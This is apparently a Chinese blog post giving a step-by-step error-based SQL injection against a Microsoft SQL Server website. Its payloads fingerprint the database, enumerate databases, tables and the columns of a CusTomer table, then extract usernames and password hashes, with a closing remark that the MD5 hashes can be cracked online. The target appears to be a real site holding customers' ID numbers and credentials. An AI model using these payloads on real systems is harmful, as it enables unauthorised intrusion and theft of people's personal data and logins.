注入点屏蔽了and语句and 1=2 没有报错,就用or语句。


wKiom1lsdFuTL_hRAABAC1JrA_E416.png-wh_50

wKioL1lsdFui1qGTAABatfXPJ0c071.png-wh_50









and (select count(*) from sysobjects)>0 返回正常就是mssql数据库


wKiom1lsdFzCfQYEAABHiwAsXgQ307.png-wh_50





and 1=(select @@version) 查看版本信息


wKioL1lsdFyB63OdAAA7B1DmCXo820.png-wh_50






and 1=(select db_name())获取当前所在数据库名(对其他数据库没有权限)

wKioL1lsdFyxDnZXAAA662saejg426.png-wh_50





and 1=(select top 1 name from master..sysdatabases where dbid>4)

获取第一个数据库名



wKiom1lsdF2w5mheAAAum_FjHsQ198.png-wh_50





and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一个数据库库名') 获取第二个数据库库名


wKiom1lsdF2AQK0pAAA4qsqPOSs307.png-wh_50





可以继续爆数据库:and 1=(select top 1 name from master..sysdatabaseswhere dbid>4 and name <> '第一个库名' and name <> '第二个库名')


wKioL1lsdF2D7o75AAA6pRWBzkY999.png-wh_50






以此类推我爆出了6个数据库

 and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一个库名' and name <> '第二个库名' and name <> '第三个库名' and name <> '第四个库名' and name <> '第五个库名' and name <> '第六个库名')


wKiom1lsdF6yDxqnAABbpjprb8k702.png-wh_50






获取第一个当前使用的数据库表名:and 1=(select top 1 name from sysobjects wherextype='u')


wKioL1lsdF6RkWhRAAAytTvPZtw041.png-wh_50





获取第二个当前使用的数据库表名:and 1=(select top 1 name from sysobjects where xtype='u and name <> '第一个数据库表名')


wKiom1lsdF-SSOCFAAA4A61Zj50653.png-wh_50





以此类推一直把所有表名全部爆出(超痛苦~

 and 1=(select top 1 name from sysobjects wherextype='u' and name <> '1' and name <> '2' and name <> '3' and name <> '4' and name <> '5' and name <> '.......................... and name <> '42')


wKiom1lsdnyzAFP9AAB6Xu1AUyU575.png-wh_50




获取第一个当前使用的数据库中的表(CusTomer)中的字段:and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'CusTomer'))


wKiom1lsdGDS3SDdAAA0n9DN-9Q962.png-wh_50



同理,一直爆该表的字段,爆完为止:and 1=(select top 1 name from syscolumns where id= (select id fromsysobjects where name = 'CusTomer')and name <> 'Account' and name<> 'Account_UseMode' and name <> 'Address' and name <>'AvailDate' and name <> 'Bind_IP' and name <> 'ContactType' andname <> 'CreateDate' and name <> 'CusTomer_ID' and name <>'CusTomer_UUID' and name <> 'Discount' and name <> 'Distinction'and name <> 'IDCardNo' and name <> 'LastCheckDate' and name<> 'LastProgID' and name <> 'LastTime' and name <> 'ModiMail'and name <> 'ModiPass' and name <> 'PayMode' and name <>'PBAnswer' and name <> 'PBQuestion' and name <> 'Purchase_Mode' andname <> 'RealName' and name <> 'Status' and name  <> 'UserAge' and name <>'UserDuty' and name <> 'UserMail' and name <> 'UserMemo' and name<> 'UserName' and name <> 'UserPass' and name <>'UserTechPost')

wKiom1lsdwLCmqbnAAB_ykb84Ps790.png-wh_50





获取第一个当前使用的数据库中的表(UserPass)中的列(CusTomer)的字段:and 1=(select top1 UserPass from CusTomer)

wKioL1lsd0HBNseSAAA0n9DN-9Q665.png-wh_50





UserName 需要一些技巧,需要编码:

wKioL1lsdGCjNFa8AABcEzOYIuM448.png-wh_50




账号密码都有了,密码是MD5加密,网上有很多都解密的!




欢迎大佬们多多批评指点!t_0032.gif





                                                                                                                                    晨风